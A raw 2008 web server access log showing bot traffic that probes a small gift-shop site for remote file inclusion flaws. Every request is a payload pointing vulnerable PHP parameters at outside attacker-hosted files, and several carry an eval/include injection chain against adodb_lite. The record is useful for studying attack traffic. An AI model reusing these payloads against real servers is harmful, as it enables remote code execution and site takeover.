12.192.82.221 - - [27/Aug/2008:07:03:24 -0700] "GET /logs/access.log/errors.php?error=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
12.192.82.221 - - [27/Aug/2008:07:03:29 -0700] "GET /errors.php?error=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
204.214.80.199 - - [27/Aug/2008:07:03:35 -0700] "GET /?dirDepth=http://borneo.siteburg.com/splash.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "morningstargifts.com"
222.233.52.18 - - [27/Aug/2008:07:03:46 -0700] "GET /logs/phphtml.php?htmlclass_path=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
222.233.52.18 - - [27/Aug/2008:07:03:46 -0700] "GET /logs/access.log%20/phphtml.php?htmlclass_path=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
222.233.52.18 - - [27/Aug/2008:07:03:46 -0700] "GET /phphtml.php?htmlclass_path=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
196.22.134.230 - - [27/Aug/2008:07:03:56 -0700] "GET /logs/errors.php?error=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.morningstargifts.com"
196.22.134.230 - - [27/Aug/2008:07:03:56 -0700] "GET /logs/access.log/errors.php?error=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.morningstargifts.com"
196.22.134.230 - - [27/Aug/2008:07:03:56 -0700] "GET /errors.php?error=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.morningstargifts.com"
12.192.82.221 - - [27/Aug/2008:07:04:01 -0700] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
12.192.82.221 - - [27/Aug/2008:07:04:01 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
201.130.79.39 - - [27/Aug/2008:07:04:05 -0700] "GET ///vwar/backup/errors.php?error=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
201.130.79.39 - - [27/Aug/2008:07:04:05 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
201.130.79.39 - - [27/Aug/2008:07:04:06 -0700] "GET /logs///vwar/backup/errors.php?error=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
12.192.82.221 - - [27/Aug/2008:07:04:16 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
222.233.52.18 - - [27/Aug/2008:07:05:37 -0700] "GET /logs/access_080719.log%20/phphtml.php?htmlclass_path=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
83.19.144.26 - - [27/Aug/2008:07:05:42 -0700] "GET //components/com_flyspray/startdown.php?file=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.morningstargifts.com"
12.192.82.221 - - [27/Aug/2008:07:05:58 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "morningstargifts.com"
217.23.156.220 - - [27/Aug/2008:07:05:59 -0700] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "morningstargifts.com"
12.192.82.221 - - [27/Aug/2008:07:06:02 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "morningstargifts.com"
222.233.52.18 - - [27/Aug/2008:07:06:02 -0700] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
222.233.52.18 - - [27/Aug/2008:07:06:02 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
12.192.82.221 - - [27/Aug/2008:07:06:04 -0700] "GET /logs/access.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "morningstargifts.com"
217.23.156.220 - - [27/Aug/2008:07:06:06 -0700] "GET /logs/access.log%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "mor